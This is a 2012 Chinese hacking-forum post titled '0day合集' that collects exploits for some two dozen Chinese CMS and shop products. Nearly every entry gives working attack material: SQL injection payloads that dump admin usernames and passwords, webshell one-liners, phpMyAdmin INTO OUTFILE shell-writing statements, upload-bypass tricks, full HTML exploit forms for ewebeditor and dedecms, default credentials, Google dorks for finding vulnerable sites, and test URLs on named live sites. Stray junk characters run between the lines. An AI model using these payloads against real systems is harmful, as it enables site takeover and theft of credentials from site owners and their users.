中国网络渗透测试联盟
标题:
0day合集
[打印本页]
作者:
admin
时间:
2012-9-13 16:58
标题:
0day合集
启航企业建站系统 cookie注入漏洞通杀所有版本
& Z0 S1 _# w+ `) {7 x0 c
. Z2 J0 C3 Y7 a
直接上exploit:
; c+ v8 ^# u7 Y+ s1 ]
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
- U [6 E0 g, C1 A* |
test:
http://www.tb11.net/system/xitong/shownews.asp?id=210
3 h2 E5 Y; {7 ~9 r1 p
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
& T1 B* N8 @+ Y/ y
Asprain论坛 注册用户 上传图片就可拿到webshell
# d _. m" J) n/ u
8 F% j* M( }: o* f( U$ J
Asprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
l6 t6 Y" E T9 @! b9 |
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
/ S4 X8 @' M6 w" G" {5 A
2.gif 为一小图片文件,一定要小,比如qq表情图片
0 B+ C |9 h) q" s
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
3 u8 q# @8 g; H! o ~1 R
4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
7 \' I8 H& ~& _
5.q.asp;.gif
0 [) ~& q) X u+ U
google:Powered by Asprain
5 Z( F2 Y6 r8 E+ y
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# ?+ u% S0 p: o
" p) f2 W, U+ N! m
ShopNum1全部系统存在上传漏洞。
W' s% q3 U8 q r/ C/ s0 |
% N6 m5 O i! D) h/ m" E
首先 在
http://www.shopnum1.com/product.html
页面查看任意产品详细说明。
5 P! n" j4 p+ i m1 \
按说明 提示登录后台。。
7 `) U6 e* ~6 w" Q0 F# q
在后台功能页面->附件管理->附件列表
0 B. P, n1 u3 {, u
可以直接上传.aspx 后缀木马
/ w; c8 U' v0 a$ n2 S
http://demo.shopnum1.com/upload/20110720083822500.aspx
/ E D7 W- p$ X
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 z1 Z3 C% H3 S, @
4 E4 m6 q' z! J: O) k3 {
牛牛CMS中小企业网站管理系统 上传漏洞
+ y" U9 P9 `; v; X
3 Z- `8 D# e& B# J' y
牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。
( C7 H0 |, K" n/ @9 d+ Z3 y
后台:admin/login.asp
1 I7 L2 U& y0 U& s/ ?, e
ewebeditor 5.5 Nday
3 o9 `1 F' e" U' P
exp:
4 g% p/ w+ g3 ~8 ?( u' S7 Z
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
. s3 p: T6 Y7 c \
<input?type=file?name=uploadfile?size=100><br><br>?
* r. ?% X8 c# `4 m
<input?type=submit?value=upload>?
' s; N! c/ c1 f/ M+ O
</form>
- ?5 U( P9 a/ m( U# s+ E* O, n1 H
ps:先上传小马.
0 j6 [5 T( t' E5 ^ c
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
4 x. ]2 Z4 |: W; C
" }7 }6 D: u/ A1 v. u8 R! i% y# b
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. E. r3 e, f% A
9 I& G p$ \3 S4 _
YothCMS 遍历目录漏洞
4 v7 {1 n ? J( B6 a5 Y2 b! h
' m4 V$ p, F% X
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
: a; d# j, f+ H. {! o9 v/ Q9 f
默认后台:admin/login.asp
3 n9 R& ?5 z7 p( R4 \8 T
遍历目录:
, ^ Y( s, w' A$ ]. L, p5 F0 ~
ewebeditor/manage/upload.asp?id=1&dir=../
1 }) ^5 N) A% d
data:
5 g0 F2 w/ f a0 ]! y
http://www.flycn.net/%23da%23ta%23
\%23db_%23data%23%23.asa
! @4 A7 J3 t8 E2 V# i
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, ^! K C8 j, Y$ ^9 h5 S
3 ~4 o! _# l% E( c7 s
Net112企业建站系统 1.0
3 D. p/ e; L0 Y. d7 P5 q* e
1 I) Y2 i9 ^9 L" ~0 n& @
源码简介:
( A+ O1 P9 }9 v- f2 T) z# b) L
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
# L8 d- c! m) L2 n
添加管理员:
$ n$ D/ E" \' A6 D. V
http://www.0855.tv/admin/admin.asp?action=add&level=2
" f) @' A! w' W9 _5 g; D
其实加不加都不是很重要,后台文件都没怎么作验证。
5 r; w9 E/ O% \6 _5 O* v7 l- E
上传路径:
# }8 x! ^4 a7 u) V) l C
http://www.0855.tv/inc/Upfile.as
... 0&ImgHeight=200
1 A4 S" P2 U8 @5 p1 V" b1 z
http://www.0855.tv/inc/Upfile.asp?Stype=2
- b( {% `" u, ~# h) }
怎么利用自己研究。
+ u# r, E, }1 |& M4 D" r
遍历目录:
4 L5 `! L) ?0 W; _
http://www.0855.tv/admin/upfile.asp?path=../..
# ^* Z6 h! H* o2 ?/ b% @) o
如:
, r2 g6 L9 l5 x1 l* n8 ]' Q2 v, X$ r
http://www.0855.tv/admin/upfile.asp?path=../admin
* S/ E2 v1 u% {8 O; p) e
http://www.0855.tv/admin/upfile.asp?path=../data
; W! E/ O6 v2 S" }! L$ [! f5 g
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 Y" T9 d8 s8 x* ]+ M h+ H
7 ^; u) n( V, l% w6 f Q
易和阳光购物商城通杀 上传漏洞
8 ]4 V: \2 S/ s$ L3 V; J" k
/ P* x! L0 E, A( {
前提要求是IIS6.0+asp坏境。
& O; q- H1 E3 c3 x
漏洞文件Iheeo_upfile.asp
9 Z+ d/ D3 t8 w3 n; Y. n' ]
过滤不严.直接可以iis6.0上传
+ I/ ]& `& Q: t: k; D/ M
把ASP木马改成0855.asp;1.gif
5 t9 D" m, C6 c5 `3 ]7 k
直接放到明小子上传
# q6 b4 H( T1 F( |
Google搜索:inurl:product.asp?Iheeoid=
/ J; L7 B" t# ?1 A& O$ k
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
1 ~( \# i J: A
9 ^9 p9 Z; Y- g! m
phpmyadmin后台4种拿shell方法
5 M* g3 ~/ x* J: s; Q
2 t9 M2 P: u1 z
方法一:
! I3 o/ s6 E& S9 \: m( p( {
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
) }( R) M. k4 e7 ?
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');
) e2 z p+ m! N) u) ~; z }1 e# T! J
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
5 l" t* D; }- J; _
----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
) {/ ]8 J( B7 O4 h
一句话连接密码:xiaoma
/ S% w/ _ \7 C1 q: D6 Y
方法二:
}5 E: j8 q' C Y7 r
Create TABLE xiaoma (xiaoma1 text NOT NULL);
3 `! s# A0 ?# k3 y# K
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
6 A: l1 f4 d: V0 I0 a
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
0 h% Y- N# [" A& H. W
Drop TABLE IF EXISTS xiaoma;
7 E: n2 `$ _* W. ?4 Y5 x5 `
方法三:
# f. l. d5 q: E( p' b1 a: g; L
读取文件内容: select load_file('E:/xamp/www/s.php');
5 \" t) ?9 \' Y( o' {
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
+ c& [; D# b) n& w' Y
cmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
3 g7 ` M6 z" K4 U3 h
方法四:
' O+ Z3 ?( f5 N, v8 c- G
select load_file('E:/xamp/www/xiaoma.php');
6 z3 y: e# J. {9 Z4 M8 Z( D
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
7 ^7 b7 g. o' u$ d9 v6 e$ |/ T
然后访问网站目录:
http://www.xxxx.com/xiaoma.php?cmd=dir
}1 ]# ], H0 Z
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) i$ y3 w$ q5 N# y
: q6 N: k6 V: x T9 L2 c
传信网络独立开发网站源码0day漏洞
/ e+ ~6 t5 k# l5 A9 j( }
' |; C x. z# W! L1 C
后台system/login.asp
' O [ K8 H2 A! Y1 B* q, ]. y
进了后台有个ewebeditor
* U9 w! P5 e4 s
Google 搜索inurl:product1.asp?tyc=
$ A/ A9 O- p) C! E' f. x; |
编辑器漏洞默认后台ubbcode/admin_login.asp
" u5 I. q ~6 k- u
数据库ubbcode/db/ewebeditor.mdb
; g, |5 q( p0 r! e$ J% B
默认账号密码yzm 111111
% B; U/ ?) v7 ]% r. \* J6 E
" g( O' a h! r) O
拿webshell方法
5 t+ X8 I, X4 q9 p$ [
登陆后台点击“样式管理”-选择新增样式
& W* h0 R2 g. d/ X6 ]* X7 V8 f: ]* y
样式名称:scriptkiddies 随便写
2 c# `6 ]3 e& W: j# ^
路径模式:选择绝对路径
" _* Z- b. h, R; U: [; j, P
图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
- b# Z+ `4 B7 z3 ~5 r9 A
图片类型比如就是我们要上传的ASP木马格式
7 i, I& G, a3 |, [9 f \ l! U' [
上传路径:/
7 R( t* |9 Z5 z" F7 b, I
图片限制:写上1000 免的上不了我们的asp木马
# \- e& s9 ^9 Z! w( k* j
上传内容不要写
+ s( ? P6 J, z) T6 b. p0 n
可以提交了
) V) H& G6 V2 @: o
样式增加成功!
3 o; F9 R( i9 a7 B" ~, T
返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
* k( z9 p' U+ Q
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
5 E1 E9 W6 ?7 p6 l \( @
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies
. n1 g3 D8 s8 u: R- ^/ s
上ASP木马 回车 等到路径
' k* a5 R+ v% S1 v* f4 j3 a: t/ Z
! l: b; M/ O" p8 N1 U! C
后台:system/login.asp
0 f& h( W- T* X' t0 [: {. n0 r
Exp:
( t" d5 @* j x& ^0 c
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
8 e6 L) ^ ?% t
测试:
7 c! f3 g. Y7 k5 z
http://www.zjgaoneng.com/product_show.asp?id=9
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master
# U6 P8 B. p9 \+ }/ w: a
http://www.yaerli.com/product_show.asp?id=245
union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
4 f+ Q. M) A- b/ R' z; b
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
3 p" H. P, \' P0 _
' Z5 l6 k3 G$ {) C7 k' f* _+ G( Y
foosun 0day 最新注入漏洞
8 B2 C9 s! w) U
( Z T2 P' P$ X6 ?" I3 S
漏洞文件:
www.xxx.com/user/SetNextOptions.asp
5 _+ J) H' h' q' @3 \/ e M
利用简单的方法:
+ v# ]0 W8 a( d9 {) Y
暴管理员帐号:
, z# p! p3 ~; U& t P
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
' K. o8 ]* d/ P
暴管理员密码:
; n: e# t# f* G
http://www.i0day.com/user/SetNex
... amp;ReqSql=select+1,admin_pass_word,
7 M! K4 Q! Z* O _; \$ ^9 E! o9 ~
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 c% u7 k H% m a2 v5 J7 R3 A
* H+ R- S: Z6 A# k& x& D
网站程序的版权未知!
4 n- m# ?, p* O3 V1 V
& J( V. C K4 o. Q$ H, W
默认网站数据库:
" z0 F1 ^8 ^3 B% |1 Z G+ [$ d
www.i0day.com/data/nxnews.mdb
8 U( v6 s6 |6 l# _. V* d$ |" ^2 f+ w
ewebeditor 在线编辑器:
1 E: A2 y7 `. F9 }. {/ R, e8 h
编辑器数据库下载地址:
www.i0day.com/ewebeditor/db/ewebeditor.mdb
% t: [. N% g. ~( q
登录地址:ewebeditor/admin_login.asp
; X6 `+ S/ C4 b6 p0 e! Y
默认密码:admin admin
7 a) ` L3 p1 o$ p' f$ q7 J
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
, P1 E( }" n8 H$ _7 @
4 @: K4 X' B4 z/ v
Sql注入漏洞:
/ d2 |2 z+ K8 n
http://www.i0day.com/detail.asp?id=12
1 m. t# l: I! n5 i& D& F
exp:
, y/ i8 U4 H) [4 i ?
union select 1,admin,password,4,5,6,7,8 from admin
0 p8 k0 z) ~8 K
爆出明文帐号/密码
8 z# b' b, `& Q3 y$ p- Q4 e% P
- I1 z) S% l r4 p; y! A; ]( w' b
上传漏洞:
# ~. p0 c$ T, }- }
后台+upfile.asp
7 E! q/ w* ]* A b' a6 Q
如:
3 G2 Q: F# a. x+ u& j
http://www.i0day.com/manage/upfile.asp
可以用工具。如明小子。
" _! \# [( G, k' o s. M: T
shell的地址:网址+后台+成功上传的马
+ f/ U* h* }% Y
google:inurl:news.asp?lanmuName=
( k7 l0 I/ [3 u& p, I, ~ R6 T
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( p, u, i O9 x F
% B: X4 j$ [; R9 F7 ]9 h" j& n
dedecms最新0day利用不进后台直接拿WEBSHELL
& G7 }0 ?. u" w8 h9 l0 g
0 i8 Z9 D# W$ N8 s
拿webshell的方法如下:
]* ]6 f0 j4 y: h) L
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
3 G$ s5 j+ g, U- b1 W- G( ?
前题条件,必须准备好自己的dede数据库,然后插入数据:
2 V- a9 g- d9 z
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
; K4 F8 c; R6 C: k, S( @
5 J" {$ f1 [1 [+ U* ^$ J
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
' W2 K' y2 Z5 N5 f! f+ }! g) ]6 _8 g6 K
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
7 @. D2 R9 g) Y$ ~ [ A9 U
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
+ W) o% y' k$ h$ H! t# |& a: K
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
% w2 [ e" i: L! E4 o, E
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
3 w, i+ @# t, @% b2 O& h
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
% K% x! n6 x6 ]8 b
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
* @. a A. a$ b! Z2 M \4 [- q/ d: v
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
! [% d% o9 T$ H7 m
<input type="text" value="true" name="nocache" style="width:400">
: Y$ _* x2 R/ p5 g
<input type="submit" value="提交" name="QuickSearchBtn"><br />
' [3 a" W+ ?9 N
</form>
2 S- W# ~3 H5 T9 E f
<script>
4 E Z. V. r; q f4 J8 u: M+ {
function addaction()
" ?- i& h: U/ B8 _
{
- t6 b1 X/ q* N S0 v
document.QuickSearch.action=document.QuickSearch.doaction.value;
" F& q3 {) I) E! X
}
3 H/ h" H3 B( j, x2 b9 f' C. j
</script>
& l% R+ }% V% v W( C* R& e |3 O
-----------------------------------------------------------------------------------------------------------------------------------------------
% t/ o. a* \3 F0 k7 [" H' b% T( c
' O3 b- ]- ^4 `# w5 d. J/ {# J W
dedecms织梦暴最新严重0day漏洞
5 s$ I; F1 o! w% H) h; V1 A
bug被利用步骤如下:
2 l. B# m* X S3 M
http://www.2cto.com
/网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
/ Z, U6 z( W$ i4 t" V/ U
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。
8 C5 f9 j6 X# q8 ?& f# q
-------------------------------------------------------------------------------------------------------------------------------------------
- _; i. Z5 I% Y, h, n
" S# B! C* c% g+ {
多多淘宝客程序上传漏洞
+ U7 ~- |( p) R/ l7 |+ ?2 C
漏洞页面:
2 p7 n8 @3 t; A7 B$ | Q( R
admin\upload_pic.php
8 j! H, T: F9 `4 _) m
传送门:
7 \6 D+ m0 b2 @# r7 r% I2 G6 u
http://www.www.com/admin/upload_pic.php?uploadtext=slide1
2 v; e- t+ g( i. ~
PS:copy张图片马 直接 xxx.php 上传抓包地址!
6 F- X( }2 h% l# Z) G
------------------------------------------------------------------------------------------------------------------------------------------------------
) u% i5 w7 J, _
( e! F" j7 O; w0 E
无忧公司系统ASP专业版后台上传漏洞
7 [2 {0 t4 D/ O# ?9 J. u+ u F# M
漏洞文件 后台上传
; I- _( r* b+ ]* ]6 H! \
admin/uploadPic.asp
$ @3 _/ M& l/ j
漏洞利用 这个漏洞好像是雷池的
5 [1 n9 F& N0 i- s& @% M
http://forum.huc08.com/admin/upl
... ptkiddies.asp;& upload_code=ok&editImageNum=1
0 B! ?! v6 {2 f- B. e: R8 K- C" f, \
等到的webshell路径:
$ Q, d9 Q# L; [, Y3 ]! r& E L) g
/UploadFiles/scriptkiddies.asp;_2.gif
; ^2 E( y2 N) e
---------------------------------------------------------------------------------------------------------------------------------------------------
, ? U/ h9 Q2 H4 q) [& d
$ \# B5 b |5 N0 D
住哪酒店分销联盟系统2010
% j/ C2 u7 |6 |+ r6 W/ a' ]! ~
Search:
1 g/ b" P' }1 Z) y7 A
inurl:index.php?m=hotelinfo
( l# Q9 y# @. D3 L/ s
http://forum.huc08.com
/index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
: _. ~( v, ]4 G. E( G Q$ D1 Y
默认后台:index.php?m=admin/login
4 S+ Q, R6 r" I+ }
--------------------------------------------------------------------------------------------------------------------------------------------------
# f+ N1 J- ?9 w5 O: w( a0 v
) \ P# i' R) D! q( U$ h
inurl:info_Print.asp?ArticleID=
" D6 I& ?# X6 S4 Z. P5 w" k" x ^
后台 ad_login.asp
* p$ r. f4 A( G; G
爆管理员密码:
& b9 q, l" P9 N" l5 w
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
( J7 A' g3 ?5 F: L! N: v
------------------------------------------------------------------------------------------------------------------------------------------------------------
" H# m& U6 `9 w+ o N) `
8 @# K3 V3 l1 ?1 h- o
搜索框漏洞!
- J6 q; h+ }4 u
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
5 o* O+ y p" M1 j5 w* }
--------------------------------------------------------------------------------------------------------------------------------------------------------
: f9 l! ?5 C( k& L: W A
- k5 B0 P" [4 @& U' M1 x
关键字:
5 [/ S! K0 p4 h% D6 j: }! ~
inurl:/reg_TemletSel.asp?step=2
: O2 H- [, @! d: l: r, H
或者
: ?# y2 H- w6 B6 l
电子商务自助建站--您理想的助手
6 k) L$ h, I( A$ t; g0 Z; I2 {
-------------------------------------------------------------------------------------------------------------------------------------------------
# {& p$ u7 E5 x! s- n
# B+ e7 [4 d& J8 f5 i% p% y, O, x; a
iGiveTest 2.1.0注入漏洞
% F4 p8 _" P6 S K4 j; q
Version: <= 2.1.0
# Y, s; P6 [3 i! D, T0 P; g
# Homepage:
http://iGiveTest.com/
5 f+ l2 p9 K% {0 p' @4 E2 m! H
谷歌关键字: “Powered by iGiveTest”
0 B+ d8 s+ z) y9 O% l7 h
随便注册一个帐号。然后暴管理员帐号和密码
7 v' ~2 G. ^' W: J& f j
http://www.xxxx.com/users.php?ac
... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
9 `- [+ c( f& D5 Z
------------------------------------------------------------------------------------------------------------------------------------------------
- H% h. H) q3 m0 e
6 v# J4 L$ w: }& l( b9 f7 {8 I$ x9 U
CKXP网上书店注入漏洞
6 c9 Q- Z8 F3 `& P: N, w d
工具加表:shop_admin 加字段:admin
1 A Y. P9 V2 T; }
后台:admin/login.asp
3 ^* }2 l4 J# j3 b5 z5 x
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
7 q A6 ^3 H! u7 \# [" ^, y& O# x
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
. b- B! \: a. J" N& R8 z6 e
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
$ E7 T! A- b) l. F0 T6 k
: `; v$ N( O' Y) x7 R% b% D
段富超个人网站系统留言本写马漏洞
( |3 w) q& w" C+ y' E
源码下载:
http://www.mycodes.net/24/2149.htm
3 J- n: a9 J8 Z, h2 s, o6 T
addgbook.asp 提交一句话。
2 Z6 a' Y( I; J3 C0 p; Q" K
连接:
http://www.xxxx.tv/date/date3f.asp
7 V5 n4 S9 t {) G* C9 K9 D7 g$ Q
google:为防批量,特略!
; \3 J M' r/ o g, ^) D
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 W/ r. U6 l8 Y! E) S
/ [4 N* }+ x% k$ y# p
智有道专业旅游系统v1.0 注入及列目录漏洞
$ Q! v' O# v6 m
默认后台路径:/admin/login.asp
9 \' V! q2 N: h; f
默认管理员:admin
) `9 d4 _0 c+ ]1 g
默认密码:123456
1 ]6 P7 \) B. p z% ]- V1 j
SQL EXP Tset:
6 o9 f! u; O7 ^! b3 B) I% b
http://www.untnt.com/info/show.asp?id=90
union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
6 I% l, I# E" J* F+ u, M
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ H( O& K9 w8 ?% y. e) Y* q3 \& O
3 T% ]0 O6 _/ J R- I4 M# Z
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
3 O5 A% C2 g3 _
EXP:
2 d! \7 `) u1 A" q3 v
<title>eWebeditoR3.8 for php任意文件上EXP</title>
) ]$ g; F: O- j" ^
<form action="" method=post enctype="multip
0 ]8 c* _' g- L7 R+ i
art/form-data">
2 i! m* g, y6 {
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
' W/ X7 W7 {8 |, w9 f% P3 @7 h
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
- N$ h& j6 s w! @8 y% F* |4 X
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
9 w6 c- V- h8 W7 ^0 v, ^
file:<input type=file name="uploadfile"><br>
( p% M2 q8 I: A: |; V, y
<input type=button value=submit onclick=fsubmit()>
. O6 Y, }3 w# ]% i% s
</form><br>
' K' l7 u7 {+ Q# T: ~# R& w" `
<script>
( E" K2 M0 w. _1 r$ @9 M6 l3 N
function fsubmit(){
: Q% L2 p' n; o! q& {0 g
form = document.forms[0];
5 }- n5 z0 a. f7 C. L
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
! B3 e3 p/ B1 ]4 g0 i
alert(form.action);
8 J5 M4 S! {8 D
form.submit();
* {2 y5 }- u8 c: Y( b5 I4 U8 [! O
}
. L& Z8 m! S/ Q) H$ T; [
</script>
8 K3 F% I. g( }% V& r
注意修改里面ewebeditor的名称还有路径。
8 S& ^ G) ?' _* x' t: A
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
8 X+ A( i. `0 _2 m, C2 k7 j
" h5 a; B% x. e* j
提交’时提示ip被记录 防注入系统的利用
- K+ l' n0 x, i
网址:
http://www.xxx.com/newslist.asp?id=122
′
9 v! x- z; K' _3 ?' v T# Z) c% e
提示“你的操作已被记录!”等信息。
0 l9 h7 e7 G: x/ z
利用方法:
www.xxx.com/sqlin.asp
看是否存在,存在提交
http://www.xxx.com/newslist.asp?id=122
‘excute(request("TNT"))写入一句话。
, }5 [' W) ]% S K: @* f
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 m7 f0 o& F# ]8 q: d: `8 |& G0 D
( ^1 F3 F3 w7 P
西部商务网站管理系统 批量拿shell-0day
% P" I6 _+ p% `; z9 y' s
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
3 I0 [4 I1 H8 g) P, n; O
1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
1 o8 V! |+ ?" m, I4 u
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
, d% n0 Q" ^' ^
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂
3 e) p0 ~+ J! D( {. @2 h
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ w% ?+ m" r& |7 O3 X
3 a2 X% J6 x4 j1 S& j
JspRun!6.0 论坛管理后台注入漏洞
2 E" h) T* L; R+ W) C; P
, l7 e- h. t* I0 y
SEBUG-ID:20787 发布时间:2011-04-30 影响版本:
' U& j+ I$ Y! M5 A; Y8 h7 q3 \4 l
JspRun!6.0
# C! H7 Y. e( M: x0 F
漏洞描述:
# _2 i! ^3 B- c D' e
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
/ u2 [' G0 |( g/ X" s0 z" }) ~+ q
在处理后台提交的文件中ForumManageAction.java第1940行
8 q, z& K! N4 ^) D# Z2 G9 {
String export = request.getParameter("export");//直接获取,没有安全过滤
4 K1 e" r' u: C) y" y. H
if(export!=null){
( C. I1 ?4 d" s% p3 c- U9 W5 N6 u+ R% J
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...
% ^; S0 v# A/ @. Y4 y! ^, u
if(styles==null||styles.size()==0){
$ d6 E9 a1 t8 Q' h7 ?2 P. v: ~: l
<*参考
b$ H" i/ b0 _" n& H! J
nuanfan@gmail.com
, r9 \0 ?3 m$ G, a( K- f
*> SEBUG安全建议:
- s* \# |9 q. ^- x- W0 T( r
www.jsprun.net
. Z0 }0 [/ w, H' R3 i! i
(1)安全过滤变量export
0 L: v) I& U; i. |+ b1 l, M
(2)在查询语句中使用占位符
3 Y e# z1 F* u
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, t% d. D; K1 W9 T [( F0 W
$ v$ J4 @# s( Y+ J
乌邦图企业网站系统 cookies 注入
+ G: \1 a. B4 J1 k+ D
6 C# |) M P1 b! m2 H) H' T7 f
程序完整登陆后台:/admin/login.asp
/ m/ P g, P" c/ [2 o) A
默认登陆帐号:admin 密码:admin888
" H: l, g6 J& J, x
语句:(前面加个空格)
9 s/ s/ S% q7 c8 C5 k& ~3 I6 R( k
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
) g7 o4 |9 {- [+ ^( h( V0 m% i
或者是16个字段:
' ]* R5 l0 |$ Q
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
% j# v7 I7 M* I8 d6 a8 T
爆不出来自己猜字段。
) X- G+ f1 q- ]$ P1 ?
注入点:
http://www.untnt.com/shownews.asp?=88
: I6 O+ l% |$ S( g- ~
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
3 V7 p- O3 @. ^7 z' K, j+ ?
关键字:
7 z; u7 c$ \9 S% h
inurl:shownews?asp.id=
/ a4 a- ]9 q A9 l! D
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
# x9 n* a( z v6 S
9 h! m" q# d) G
CKXP网上书店注入漏洞
4 K) z }: a& x. X- X' \( _
1 \ s! b1 p7 M9 _' D. [
工具加表:shop_admin 加字段:admin
3 @3 z& }' `5 y$ x& E4 Z+ m( @
后台:admin/login.asp
* O# X8 D# `8 y/ P1 j: T! P& E
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
2 ~5 a+ _; a- F" f" e& }
